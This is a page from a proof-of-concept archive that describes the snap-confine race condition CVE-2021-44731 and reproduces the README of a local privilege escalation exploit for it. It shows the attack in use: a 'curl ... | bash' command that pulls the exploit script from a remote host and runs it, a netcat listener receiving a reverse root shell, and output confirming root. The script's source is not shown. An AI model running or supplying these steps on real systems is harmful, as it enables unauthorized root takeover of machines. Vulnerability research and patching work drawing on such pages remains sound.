Related vulnerability
Title: Snapd race condition vulnerability (CVE-2021-44731)
Description: Snapd is an open-source, cross-platform package management tool. snapd 2.54.2 contains a race condition: when preparing a snap's private mount namespace, the snap-confine binary in snap 2.54.2 is subject to a race condition. A local attacker could exploit this by bind-mounting their own content into the snap's private mount namespace, gaining root privileges and executing arbitrary code, resulting in privilege escalation.
Description
Local Privilege Escalation Exploit for CVE-2021-44731
Introduction
# CVE-2021-44731-snap-confine-SUID
Local Privilege Escalation Exploit for CVE-2021-44731, snap-confine 2.54.2 and lower
All credit to Qualys for finding this and providing a detailed exploit.
https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt
Quick and dirty snap-confine LPE. It searches for a vulnerable version of snap-confine and, if one is found, exploits it.
Returns a root shell; catch it with netcat.
```console
$ id
uid=1001(vulnchain) gid=1001(vulnchain) groups=1001(vulnchain)
$ curl http://10.8.0.134/snap_confine_LPE.sh | bash
curl http://10.8.0.134/snap_confine_LPE.sh | bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2073 100 2073 0 0 28397 0 --:--:-- --:--:-- --:--:-- 28013
Non-vulnerable version found: 2.54.3
Vulnerable version found: 2.44.3 at /usr/lib/snapd/snap-confine
Vulnerable version found: 2.44.3 at /home/vulnchain/snap-confine
Performing actions with a vulnerable version...
Chosen vulnerable version: 2.44.3
```
## Root Shell
```console
┌──(root㉿kali)-[~]
└─# nc -lvnp 4447
listening on [any] 4447 ...
connect to [10.8.0.134] from (UNKNOWN) [10.10.111.136] 56050
bash: cannot set terminal process group (609): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-10-14:/# id
id
uid=0(root) gid=0(root) groups=0(root),1001(vulnchain)
root@ip-10-10-10-14:/#
```
File snapshot
[4.0K] /data/pocs/d2aab03ac9470db3b66dbb0ceb4b37caed84c6f0
├── [1.4K] README.md
└── [1.9K] snap_confine_LPE.sh
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating to the local POC archive. Thank you for your support.